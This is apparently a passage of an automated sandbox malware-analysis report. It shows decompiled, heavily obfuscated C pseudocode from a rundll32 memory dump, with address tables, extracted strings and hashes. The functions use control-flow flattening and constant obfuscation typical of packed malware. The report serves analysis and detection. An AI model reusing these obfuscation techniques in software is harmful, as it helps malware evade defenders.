				_v56 = _v56 ^ 0x39ca05a5;
				_v92 = 0x8073;
				_v92 = _v92 + 0xffff9dce;
				_v92 = _v92 >> 3;
				_v92 = _v92 | 0xecb06e9c;
				_v92 = _v92 ^ 0xecb02b11;
				_v96 = 0x9ec7;
				_v96 = _v96 * 0x45;
				_v96 = _v96 * 0xb;
				_v96 = _v96 + 0xffff076d;
				_v96 = _v96 ^ 0x01d5e378;
				_v44 = 0xc2f0;
				_v44 = _v44 * 0x57;
				_v44 = _v44 ^ 0x0042286a;
				_v64 = 0x222a;
				_v64 = _v64 ^ 0x827e40a1;
				_v64 = _v64 >> 2;
				_v64 = _v64 ^ 0x209fb485;
				_t207 = _v40;
				_t212 = _v40;
				goto L1;
				do {
					while(1) {
						L1:
						_t215 = _t208 - 0x1e157ff7;
						if(_t215 > 0) {
							break;
						}
						if(_t215 == 0) {
							E001AE380(_v92, _v36, _v96);
							_pop(_t191);
							_t208 = 0x2855765d;
							continue;
						}
						if(_t208 == 0x62b7233) {
							E001A38D7(_v20 + 1, _v52, _t191, _v56, _v24);
							_t191 = _v28;
							_t213 =  &(_t213[3]);
							_t186 = 1;
							_t208 = 0x1e157ff7;
							 *((intOrPtr*)( *0x10020724 + 0x440)) = _v28;
							continue;
						}
						if(_t208 == 0x72c744f) {
							_t208 = 0x109c2e25;
							continue;
						}
						if(_t208 == 0x109c2e25) {
							_t212 = E001A274E();
							_t208 = 0x2949e215;
							continue;
						}
						if(_t208 != 0x15d49008) {
							goto L21;
						} else {
							_t191 = _v60;
							_t182 = E001B8EE2(_v60, _v104, _v80, _v108,  &_v36,  &_v28);
							_t213 =  &(_t213[4]);
							asm("sbb esi, esi");
							_t208 = ( ~_t182 & 0xe815f23c) + 0x1e157ff7;
							continue;
						}
					}
					if(_t208 == 0x2855765d) {
						E001A1631(_t207, _v44, _v64);
						_pop(_t191);
						_t208 = 0x7c17df7;
						goto L21;
					}
					if(_t208 == 0x28bc7ea6) {
						_t208 = 0x2855765d;
						if(_v40 > 2) {
							_t184 = E001A8355( *((intOrPtr*)(_t207 + 8)),  &_v32, _v68, _v48);
							_v36 = _t184;
							_pop(_t191);
							if(_t184 != 0) {
								_t208 = 0x15d49008;
							}
						}
						goto L1;
					}
					if(_t208 != 0x2949e215) {
						goto L21;
					}
					_t191 =  &_v40;
					_t185 = E001B6919( &_v40, _v72, _t212, _v76, _v84, _v88);
					_t207 = _t185;
					_t213 =  &(_t213[4]);
					if(_t185 == 0) {
						break;
					}
					_t208 = 0x28bc7ea6;
					goto L1;
					L21:
				} while (_t208 != 0x7c17df7);
				return _t186;
			}

0x001b7d78
0x001b7d7b
0x001b7d86
0x001b7d88
0x001b7d8c
0x001b7d90
0x001b7d98
0x001b7da0
0x001b7da8
0x001b7dad
0x001b7db2
0x001b7dba
0x001b7dc2
0x001b7dc7
0x001b7dcf
0x001b7dd7
0x001b7de8
0x001b7ded
0x001b7df3
0x001b7dfb
0x001b7e00
0x001b7e08
0x001b7e0d
0x001b7e15
0x001b7e1d
0x001b7e25
0x001b7e2d
0x001b7e35
0x001b7e3d
0x001b7e42
0x001b7e4a
0x001b7e52
0x001b7e57
0x001b7e5f
0x001b7e67
0x001b7e6f
0x001b7e74
0x001b7e7c
0x001b7e84
0x001b7e89
0x001b7e91
0x001b7e99
0x001b7ea1
0x001b7ea9
0x001b7eb1
0x001b7eb9
0x001b7ec1
0x001b7ec9
0x001b7ed1
0x001b7ed9
0x001b7ee1
0x001b7ee6
0x001b7eeb
0x001b7ef0
0x001b7ef8
0x001b7f04
0x001b7f07
0x001b7f0b
0x001b7f13
0x001b7f1b
0x001b7f23
0x001b7f2b
0x001b7f33
0x001b7f3b
0x001b7f40
0x001b7f48
0x001b7f50
0x001b7f5d
0x001b7f66
0x001b7f6a
0x001b7f72
0x001b7f7a
0x001b7f87
0x001b7f8b
0x001b7f93
0x001b7f9b
0x001b7fa3
0x001b7fa8
0x001b7fb0
0x001b7fb4
0x001b7fb4
0x001b7fb8
0x001b7fb8
0x001b7fb8
0x001b7fb8
0x001b7fbe
0x00000000
0x00000000
0x001b7fc4
0x001b8084
0x001b8089
0x001b808a
0x00000000
0x001b808a
0x001b7fd0
0x001b8054
0x001b8060
0x001b8064
0x001b8067
0x001b8068
0x001b806d
0x00000000
0x001b806d
0x001b7fd8
0x001b8036
0x00000000
0x001b8036
0x001b7fe0
0x001b802d
0x001b802f
0x00000000
0x001b802f
0x001b7fe8
0x00000000
0x001b7fee
0x001b8004
0x001b8008
0x001b800d
0x001b8014
0x001b801c
0x00000000
0x001b801c
0x001b7fe8
0x001b809a
0x001b811f
0x001b8124
0x001b8125
0x00000000
0x001b8125
0x001b80a2
0x001b80de
0x001b80e3
0x001b80f8
0x001b80fd
0x001b8102
0x001b8105
0x001b810b
0x001b810b
0x001b8105
0x00000000
0x001b80e3
0x001b80aa
0x00000000
0x00000000
0x001b80b0
0x001b80c1
0x001b80c6
0x001b80c8
0x001b80cd
0x00000000
0x00000000
0x001b80cf
0x00000000
0x001b812a
0x001b812a
0x001b813f

Strings

]vU(, xrefs: 001B808A
ar-KW, xrefs: 001B8059
*V, xrefs: 001B7DF3
]vU(, xrefs: 001B8094
*", xrefs: 001B7F93
6>, xrefs: 001B7F0B
]vU(, xrefs: 001B80DE
j(B, xrefs: 001B7F8B

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *"$*V$6>$]vU($]vU($]vU($ar-KW$j(B
API String ID: 0-2825783108
Opcode ID: a089b985abed9d822d90dfa0975a8183dd12493b60d61d643f8e1f3689ec9423
Instruction ID: bf423a8d71a6e28c29e0e3c668d8b3959fa80b60367c9fea869ee5cf0a0d5ccd
Opcode Fuzzy Hash: a089b985abed9d822d90dfa0975a8183dd12493b60d61d643f8e1f3689ec9423
Instruction Fuzzy Hash: 409142724083019FD354DF69C48946BFBF1BBD8758F508A1DF4A9A62A0C7B58A09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 001AA4E1, Relevance: 10.2, Strings: 8, Instructions: 159
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001AA4E1() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				unsigned int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t146;
				void* _t150;
				signed int _t151;
				void* _t152;
				void* _t173;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed int _t181;
				signed int* _t182;

				_t182 =  &_v568;
				_v564 = 0x5008;
				_t152 = 0xef789e4;
				_t175 = 0x11;
				_v564 = _v564 / _t175;
				_v564 = _v564 + 0xeb65;
				_t173 = 0;
				_v564 = _v564 + 0x8abc;
				_v564 = _v564 ^ 0x00015271;
				_v528 = 0xd644;
				_v528 = _v528 | 0x40ed2d51;
				_v528 = _v528 ^ 0x40edea71;
				_v552 = 0xe5c5;
				_v552 = _v552 + 0xe9a1;
				_v552 = _v552 ^ 0xf9447d78;
				_v552 = _v552 ^ 0xf945bee8;
				_v536 = 0x956;
				_v536 = _v536 >> 2;
				_v536 = _v536 | 0x02042004;
				_v536 = _v536 ^ 0x02046f38;
				_v540 = 0xf32a;
				_v540 = _v540 << 2;
				_t176 = 0x78;
				_v540 = _v540 * 0x7b;
				_v540 = _v540 ^ 0x01d36b4e;
				_v548 = 0x6b84;
				_v548 = _v548 >> 0xf;
				_v548 = _v548 / _t176;
				_v548 = _v548 ^ 0x000026e2;
				_v556 = 0x8cd;
				_v556 = _v556 >> 9;
				_v556 = _v556 ^ 0x00005c70;
				_v524 = 0xd9af;
				_t177 = 0x7b;
				_v524 = _v524 / _t177;
				_v524 = _v524 ^ 0x000043ef;
				_v568 = 0x8668;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x3ff3bfbf;
				_t178 = 0x37;
				_v568 = _v568 / _t178;
				_v568 = _v568 ^ 0x00db8acb;
				_v560 = 0x8717;
				_t179 = 0x13;
				_t181 = _v556;
				_v560 = _v560 / _t179;
				_v560 = _v560 << 7;
				_v560 = _v560 >> 6;
				_v560 = _v560 ^ 0x0000038a;
				_v544 = 0x4d31;
				_v544 = _v544 * 0x3d;
				_v544 = _v544 | 0x70257490;
				_v544 = _v544 ^ 0x70370503;
				_v532 = 0x8e14;
				_v532 = _v532 << 0xf;
				_v532 = _v532 ^ 0x470a638b;
				_t151 = _v556;
				_t180 = _v556;
				do {
					while(_t152 != 0x180e2ef) {
						if(_t152 == 0xef789e4) {
							_t152 = 0x16a1f901;
							continue;
						}
						if(_t152 == 0x16a1f901) {
							_t146 = E001A4BA2();
							_t180 = _t146;
							if(_t146 == 0) {
								L9:
								return _t173;
							}
							_t152 = 0x2b0760f7;
							continue;
						}
						if(_t152 == 0x1b1ae427) {
							_t151 = E001B7A96(_v544, _t181, _v532);
							_t152 = 0x36eaec4e;
							continue;
						}
						if(_t152 == 0x2b0760f7) {
							_t150 = E001A2A18(_v552, _v536, _t180, _v540, _v548, _t152,  &_v520);
							_t182 =  &(_t182[5]);
							if(_t150 == 0) {
								goto L9;
							}
							_t152 = 0x180e2ef;
							continue;
						}
						if(_t152 != 0x36eaec4e) {
							goto L17;
						}
						_v568 = 0x7790;
						_v568 = _v568 ^ 0xaf12840f;
						_v568 = _v568 >> 0xd;
						_v568 = _v568 + 0x4419;
						_v568 = _v568 ^ 0x2a22bc52;
						if(_t151 == _v568) {
							_t173 = 1;
						}
						goto L9;
					}
					_t181 = E001B1489(_v556, _v524, _v568,  &_v520);
					_t152 = 0x1b1ae427;
					L17:
				} while (_t152 != 0x2f88791e);
				goto L9;
			}

0x001aa4e1
0x001aa4e7
0x001aa4f5
0x001aa500
0x001aa505
0x001aa50b
0x001aa513
0x001aa515
0x001aa51d
0x001aa525
0x001aa52d
0x001aa535
0x001aa53d
0x001aa545
0x001aa54d
0x001aa555
0x001aa55d
0x001aa565
0x001aa56a
0x001aa572
0x001aa57a
0x001aa582
0x001aa58c
0x001aa58f
0x001aa593
0x001aa59b
0x001aa5a3
0x001aa5b0
0x001aa5b4
0x001aa5bc
0x001aa5c4
0x001aa5c9
0x001aa5d1
0x001aa5dd
0x001aa5e2
0x001aa5e8
0x001aa5f0
0x001aa5f8
0x001aa5fd
0x001aa609
0x001aa60e
0x001aa614
0x001aa61c
0x001aa628
0x001aa62b
0x001aa62f
0x001aa633
0x001aa638
0x001aa63d
0x001aa645
0x001aa652
0x001aa656
0x001aa65e
0x001aa666
0x001aa66e
0x001aa673
0x001aa67b
0x001aa67f
0x001aa683
0x001aa683
0x001aa695
0x001aa768
0x00000000
0x001aa768
0x001aa6a1
0x001aa753
0x001aa758
0x001aa75c
0x001aa6f1
0x001aa6fd
0x001aa6fd
0x001aa75e
0x00000000
0x001aa75e
0x001aa6ad
0x001aa73f
0x001aa741
0x00000000
0x001aa741
0x001aa6b5
0x001aa715
0x001aa71a
0x001aa71f
0x00000000
0x00000000
0x001aa721
0x00000000
0x001aa721
0x001aa6bd
0x00000000
0x00000000
0x001aa6c3
0x001aa6cb
0x001aa6d3
0x001aa6d8
0x001aa6e0
0x001aa6ec
0x001aa6f0
0x001aa6f0
0x00000000
0x001aa6ec
0x001aa78a
0x001aa78c
0x001aa791
0x001aa791
0x00000000

Strings

e, xrefs: 001AA50B
C, xrefs: 001AA5E8
1M, xrefs: 001AA645
N6, xrefs: 001AA741
N6, xrefs: 001AA6B7
V, xrefs: 001AA55D
q@, xrefs: 001AA535
p\, xrefs: 001AA5C9

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1M$N6$N6$V$e$p\$q@$C
API String ID: 0-1521160778
Opcode ID: 47f7148c556bceb475f2772495399a1ff8950f59f9c56cf1113f481c5ca67ecf
Instruction ID: 46693245a1ec7f815ef0667ae75fe265c7e1ec876dfafc7f45a6dafbee539d68
Opcode Fuzzy Hash: 47f7148c556bceb475f2772495399a1ff8950f59f9c56cf1113f481c5ca67ecf
Instruction Fuzzy Hash: 2E61747510D3419BD398CE25C48941FBBE5FFC4768F94491EF58A9A2A0C7B4CA49CB83

Uniqueness

Uniqueness Score: -1.00%

Function 001AA7A2, Relevance: 9.0, Strings: 7, Instructions: 240
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001AA7A2() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				unsigned int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _t249;
				intOrPtr* _t251;
				signed int _t252;
				signed int _t260;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t302;
				void* _t305;
				signed int* _t306;
				signed int _t313;

				_t306 =  &_v104;
				_v8 = 0x110da;
				_v4 = 0;
				_v92 = 0x7412;
				_v92 = _v92 << 2;
				_v92 = _v92 + 0xffffe1bd;
				_v12 = 0;
				_t302 = 0x21f3d08f;
				_t262 = 0x1a;
				_v92 = _v92 / _t262;
				_v92 = _v92 ^ 0x800010b0;
				_v96 = 0x902b;
				_v96 = _v96 >> 9;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 ^ 0x6eb2714a;
				_v96 = _v96 ^ 0x6eb27148;
				_v44 = 0x3f49;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x00079abe;
				_v64 = 0xcee2;
				_v64 = _v64 ^ 0x1134a44f;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x268d4c68;
				_v104 = 0x3a79;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x598426cd;
				_v104 = _v104 + 0x6d2b;
				_v104 = _v104 ^ 0x598487be;
				_v56 = 0x10a8;
				_v56 = _v56 << 0x10;
				_t263 = 0x32;
				_v56 = _v56 / _t263;
				_v56 = _v56 ^ 0x00554197;
				_v80 = 0x5546;
				_v80 = _v80 ^ 0x3248a4d8;
				_t264 = 0x3f;
				_v80 = _v80 / _t264;
				_v80 = _v80 >> 0xe;
				_v80 = _v80 ^ 0x00003999;
				_v84 = 0x2821;
				_v84 = _v84 + 0xfef;
				_t265 = 0x77;
				_v84 = _v84 / _t265;
				_v84 = _v84 + 0xffff39cb;
				_v84 = _v84 ^ 0xffff4958;
				_v88 = 0x1008;
				_v88 = _v88 ^ 0x19f094d7;
				_v88 = _v88 >> 3;
				_v88 = _v88 << 5;
				_v88 = _v88 ^ 0x67c2172a;
				_v60 = 0x14b4;
				_t266 = 0x34;
				_v60 = _v60 / _t266;
				_v60 = _v60 + 0xdda;
				_v60 = _v60 ^ 0x00007165;
				_v36 = 0x491d;
				_v36 = _v36 ^ 0x07ce430d;
				_v36 = _v36 ^ 0x07ce52e2;
				_v100 = 0x2dab;
				_v100 = _v100 + 0xbcc6;
				_v100 = _v100 | 0xfd0e25fa;
				_v100 = _v100 ^ 0x1c83b092;
				_v100 = _v100 ^ 0xe18d7181;
				_v40 = 0xc87d;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0x00000f4d;
				_v76 = 0x9ebd;
				_v76 = _v76 + 0xffff7a71;
				_v76 = _v76 >> 5;
				_v76 = _v76 | 0x51d85a0f;
				_v76 = _v76 ^ 0x51d87494;
				_v48 = 0x72d3;
				_v48 = _v48 + 0xffff14a1;
				_v48 = _v48 + 0xffff27ed;
				_v48 = _v48 ^ 0xfffee94e;
				_v52 = 0xbe7e;
				_t267 = 0x1b;
				_v52 = _v52 / _t267;
				_t268 = 0x50;
				_v52 = _v52 / _t268;
				_v52 = _v52 ^ 0x00004ff8;
				_v24 = 0x9a6;
				_t269 = 0xd;
				_v24 = _v24 / _t269;
				_v24 = _v24 ^ 0x00000dbc;
				_v28 = 0xc55e;
				_v28 = _v28 ^ 0xc1d10a24;
				_v28 = _v28 ^ 0xc1d1f779;
				_v32 = 0x2879;
				_t270 = 0x53;
				_t260 = _v12;
				_t305 = 0x5c;
				_v32 = _v32 * 0x2d;
				_v32 = _v32 ^ 0x000779d7;
				_v20 = 0x9335;
				_v20 = _v20 >> 9;
				_v20 = _v20 ^ 0x00000d0d;
				_v68 = 0x7b7f;
				_v68 = _v68 + 0x5285;
				_v68 = _v68 + 0x8909;
				_v68 = _v68 * 0x6d;
				_v68 = _v68 ^ 0x00924d65;
				_v72 = 0x86e2;
				_v72 = _v72 + 0xffff86e1;
				_v72 = _v72 << 0xb;
				_t249 = _v72;
				_v72 = _t249 / _t270;
				_v72 = _v72 ^ 0x000102c8;
				while(1) {
					L1:
					_t251 = 0x20b5600c;
					do {
						while(_t302 != 0x10dff542) {
							if(_t302 == _t251) {
								_t299 = _v24;
								_t252 = E001A7BA5(_v16, _v24, _t260, _v28, _v32);
								_t306 =  &(_t306[3]);
								__eflags = _t252;
								_t302 = 0x31834b6a;
								_v12 = 0 | __eflags == 0x00000000;
								goto L1;
							} else {
								if(_t302 == 0x21f3d08f) {
									_t302 = 0x10dff542;
									continue;
								} else {
									if(_t302 == 0x31834b6a) {
										E001A25C8(_v20, _v16, _v72);
									} else {
										if (_t302 != 0x33c728fa) goto L17;
										 *_t251 =  *_t251 + _t251;
										_t260 = _t260 + _t260;
										_t313 = _t260;
									}
								}
							}
							L20:
							return _v12;
						}
						_t261 =  *0x10020724;
						while(1) {
							__eflags =  *_t261 - _t305;
							if( *_t261 == _t305) {
								break;
							}
							_t261 = _t261 + 2;
							__eflags = _t261;
						}
						_t260 = _t261 + 2;
						__eflags = _t260;
						_t302 = 0x33c728fa;
					} while (_t302 != 0x2baeeb18);
					goto L20;
				}
			}

0x001aa7a2
0x001aa7a5
0x001aa7af
0x001aa7b5
0x001aa7bd
0x001aa7c2
0x001aa7ce
0x001aa7d2
0x001aa7dd
0x001aa7e2
0x001aa7e8
0x001aa7f0
0x001aa7f8
0x001aa7fd
0x001aa802
0x001aa80a
0x001aa812
0x001aa81a
0x001aa81f
0x001aa827
0x001aa82f
0x001aa837
0x001aa83c
0x001aa844
0x001aa84c
0x001aa851
0x001aa859
0x001aa861
0x001aa869
0x001aa871
0x001aa87a
0x001aa87f
0x001aa885
0x001aa88d
0x001aa895
0x001aa8a1
0x001aa8a6
0x001aa8ac
0x001aa8b1
0x001aa8b9
0x001aa8c1
0x001aa8cd
0x001aa8d2
0x001aa8d8
0x001aa8e0
0x001aa8e8
0x001aa8f0
0x001aa8f8
0x001aa8fd
0x001aa902
0x001aa90a
0x001aa916
0x001aa919
0x001aa91d
0x001aa925
0x001aa92d
0x001aa935
0x001aa93d
0x001aa947
0x001aa94f
0x001aa957
0x001aa95f
0x001aa967
0x001aa96f
0x001aa977
0x001aa97c
0x001aa984
0x001aa98c
0x001aa994
0x001aa999
0x001aa9a1
0x001aa9a9
0x001aa9b1
0x001aa9b9
0x001aa9c1
0x001aa9c9
0x001aa9d7
0x001aa9dc
0x001aa9e6
0x001aa9eb
0x001aa9f1
0x001aa9f9
0x001aaa05
0x001aaa0a
0x001aaa10
0x001aaa18
0x001aaa20
0x001aaa28
0x001aaa30
0x001aaa3d
0x001aaa3e
0x001aaa44
0x001aaa45
0x001aaa49
0x001aaa51
0x001aaa59
0x001aaa5e
0x001aaa66
0x001aaa6e
0x001aaa76
0x001aaa83
0x001aaa87
0x001aaa8f
0x001aaa97
0x001aaa9f
0x001aaaa4
0x001aaaaa
0x001aaaae
0x001aaab6
0x001aaab6
0x001aaab6
0x001aaabb
0x001aaabb
0x001aaac9
0x001aab89
0x001aab92
0x001aab99
0x001aab9c
0x001aab9e
0x001aaba6
0x00000000
0x001aaacf
0x001aaad5
0x001aab77
0x00000000
0x001aaadb
0x001aaae1
0x001aabe5
0x001aaae7
0x001aaaed
0x001aaaf0
0x001aaaf2
0x001aaaf2
0x001aaaf2
0x001aaae1
0x001aaad5
0x001aabec
0x001aabf7
0x001aabf7
0x001aabaf
0x001aabba
0x001aabba
0x001aabbd
0x00000000
0x00000000
0x001aabb7
0x001aabb7
0x001aabb7
0x001aabbf
0x001aabbf
0x001aabc2
0x001aabc7
0x00000000
0x001aabd3

Strings

ar-KW, xrefs: 001AABAF
+m, xrefs: 001AA859
y(, xrefs: 001AAA30
FU, xrefs: 001AA88D
eq, xrefs: 001AA925
!(, xrefs: 001AA8B9
I?, xrefs: 001AA812

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !($+m$FU$I?$ar-KW$eq$y(
API String ID: 0-2344302855
Opcode ID: fd4d82faa21955852a1ef5c0c6a71c36be96f77fd8914e7b3b3598e4d89b798b
Instruction ID: 2f2c271d85fe749f6dcd336c034cad0c8744d867712d9a25358b1adbcd9a57e5
Opcode Fuzzy Hash: fd4d82faa21955852a1ef5c0c6a71c36be96f77fd8914e7b3b3598e4d89b798b
Instruction Fuzzy Hash: 24B131725093409FE358CF25C88A91BBBF2BBC5758F508A1DF199862A0D7B5D949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 001AE871, Relevance: 9.0, Strings: 7, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E001AE871() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				unsigned int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				void* _t225;
				void* _t237;
				intOrPtr _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int* _t269;

				_t269 =  &_v1148;
				_v1056 = 0x70a491;
				_v1052 = 0x4abc55;
				_t237 = 0x1a747ee1;
				_v1048 = 0;
				_t260 = 0;
				_v1044 = 0;
				_v1144 = 0xa81;
				_v1144 = _v1144 + 0xffffc1d5;
				_t261 = 0x1a;
				_v1144 = _v1144 / _t261;
				_v1144 = _v1144 + 0xb8f;
				_v1144 = _v1144 ^ 0x09d8a735;
				_v1088 = 0x84c8;
				_v1088 = _v1088 >> 7;
				_v1088 = _v1088 ^ 0x00004836;
				_v1124 = 0xc680;
				_t262 = 0x71;
				_v1124 = _v1124 / _t262;
				_v1124 = _v1124 ^ 0x0accb399;
				_v1124 = _v1124 ^ 0x0acc914d;
				_v1112 = 0x3108;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 << 5;
				_v1112 = _v1112 ^ 0x000064d0;
				_v1068 = 0xa3e7;
				_v1068 = _v1068 | 0x6ea4e7cb;
				_v1068 = _v1068 ^ 0x6ea4b0c4;
				_v1064 = 0xa962;
				_v1064 = _v1064 ^ 0xad3ff7a4;
				_v1064 = _v1064 ^ 0xad3f3e12;
				_v1116 = 0xab42;
				_v1116 = _v1116 | 0xf7ff47df;
				_v1116 = _v1116 ^ 0xf7ffff11;
				_v1104 = 0xd9a1;
				_v1104 = _v1104 << 0xc;
				_v1104 = _v1104 | 0x0a603aef;
				_v1104 = _v1104 ^ 0x0ffa70e5;
				_v1060 = 0x8050;
				_v1060 = _v1060 << 7;
				_v1060 = _v1060 ^ 0x00402cc2;
				_v1132 = 0xd967;
				_v1132 = _v1132 | 0xf0af7977;
				_v1132 = _v1132 + 0x35d3;
				_t263 = 0x29;
				_v1132 = _v1132 / _t263;
				_v1132 = _v1132 ^ 0x05deb9b0;
				_v1120 = 0xf57c;
				_t264 = 0x19;
				_v1120 = _v1120 / _t264;
				_v1120 = _v1120 << 0xa;
				_v1120 = _v1120 ^ 0x00271bed;
				_v1092 = 0xf273;
				_t265 = 0x69;
				_v1092 = _v1092 / _t265;
				_v1092 = _v1092 ^ 0x00006287;
				_v1084 = 0x94c;
				_v1084 = _v1084 ^ 0x5b799d55;
				_v1084 = _v1084 ^ 0x5b798d3c;
				_v1108 = 0x37ad;
				_v1108 = _v1108 + 0xffff498d;
				_v1108 = _v1108 ^ 0xef6f1160;
				_v1108 = _v1108 ^ 0x109092f4;
				_v1100 = 0xbc0d;
				_v1100 = _v1100 >> 8;
				_v1100 = _v1100 + 0xffffbe6f;
				_v1100 = _v1100 ^ 0xffff85f2;
				_v1148 = 0x902b;
				_v1148 = _v1148 + 0xffffa17f;
				_t266 = 0x62;
				_v1148 = _v1148 * 0x73;
				_v1148 = _v1148 << 5;
				_v1148 = _v1148 ^ 0x02c99f9b;
				_v1140 = 0xff08;
				_v1140 = _v1140 << 0xe;
				_v1140 = _v1140 << 9;
				_v1140 = _v1140 << 0xb;
				_v1140 = _v1140 ^ 0x00006101;
				_v1076 = 0xbf8f;
				_v1076 = _v1076 | 0x9f7df67d;
				_v1076 = _v1076 ^ 0x9f7d960a;
				_v1072 = 0xe803;
				_v1072 = _v1072 + 0xffff955b;
				_v1072 = _v1072 ^ 0x000024d1;
				_v1096 = 0x1537;
				_v1096 = _v1096 * 0x25;
				_v1096 = _v1096 + 0x3032;
				_v1096 = _v1096 ^ 0x000363ff;
				_v1080 = 0x66ed;
				_v1080 = _v1080 / _t266;
				_v1080 = _v1080 ^ 0x00006583;
				_v1128 = 0x7ae6;
				_v1128 = _v1128 * 0x5b;
				_v1128 = _v1128 >> 5;
				_v1128 = _v1128 + 0xf381;
				_v1128 = _v1128 ^ 0x00024350;
				_v1136 = 0x6e96;
				_v1136 = _v1136 >> 3;
				_v1136 = _v1136 | 0xd855eb0f;
				_v1136 = _v1136 >> 7;
				_v1136 = _v1136 ^ 0x01b0fce9;
				do {
					while(_t237 != 0x16cb5593) {
						if(_t237 == 0x1a747ee1) {
							_push(_t237);
							E001B1DA0(_v1124, _v1112, _v1068,  &_v1040, _v1064, _t237, _v1144);
							_t269 =  &(_t269[8]);
							_t237 = 0x356a7c34;
							continue;
						} else {
							_t273 = _t237 - 0x356a7c34;
							if(_t237 == 0x356a7c34) {
								_push(_v1060);
								_push(_v1104);
								E001AE32E(E001A5EBA(_v1116, 0x1001f820, _t273), _t273, _v1120, _v1092,  *0x10020724 + 0x238, _v1084, 0x104,  &_v520, _v1108,  &_v1040,  *0x10020724, _v1100);
								E001AED35(_v1148, _t228, _v1140, _v1076);
								_t269 =  &(_t269[0xe]);
								_t237 = 0x16cb5593;
								continue;
							}
						}
						goto L7;
					}
					_push(_v1136);
					_push(_v1128);
					_push(0);
					_push(_v1080);
					_push( &_v520);
					_push(_v1096);
					_push(0);
					_push(0);
					_t225 = E001B41AD(_v1072, __eflags);
					_t269 =  &(_t269[8]);
					__eflags = _t225;
					_t260 =  !=  ? 1 : _t260;
					_t237 = 0x3b6017a;
					L7:
					__eflags = _t237 - 0x3b6017a;
				} while (__eflags != 0);
				return _t260;
			}

0x001ae871
0x001ae877
0x001ae881
0x001ae889
0x001ae894
0x001ae898
0x001ae89a
0x001ae89e
0x001ae8a6
0x001ae8b4
0x001ae8b9
0x001ae8bf
0x001ae8c7
0x001ae8cf
0x001ae8d7
0x001ae8dc
0x001ae8e4
0x001ae8f0
0x001ae8f5
0x001ae8fb
0x001ae903
0x001ae90b
0x001ae913
0x001ae918
0x001ae91d
0x001ae925
0x001ae92d
0x001ae935
0x001ae93d
0x001ae945
0x001ae94d
0x001ae955
0x001ae95d
0x001ae965
0x001ae96d
0x001ae975
0x001ae97a
0x001ae982
0x001ae98a
0x001ae992
0x001ae997
0x001ae99f
0x001ae9a7
0x001ae9af
0x001ae9bb
0x001ae9c0
0x001ae9c6
0x001ae9ce
0x001ae9da
0x001ae9df
0x001ae9e5
0x001ae9ea
0x001ae9f2
0x001ae9fe
0x001aea01
0x001aea05
0x001aea0d
0x001aea15
0x001aea1f
0x001aea2c
0x001aea34
0x001aea3c
0x001aea44
0x001aea4c
0x001aea54
0x001aea59
0x001aea61
0x001aea69
0x001aea71
0x001aea80
0x001aea81
0x001aea85
0x001aea8a
0x001aea92
0x001aea9a
0x001aea9f
0x001aeaa4
0x001aeaa9
0x001aeab1
0x001aeab9
0x001aeac1
0x001aeac9
0x001aead1
0x001aead9
0x001aeae1
0x001aeaee
0x001aeaf2
0x001aeafa
0x001aeb02
0x001aeb10
0x001aeb14
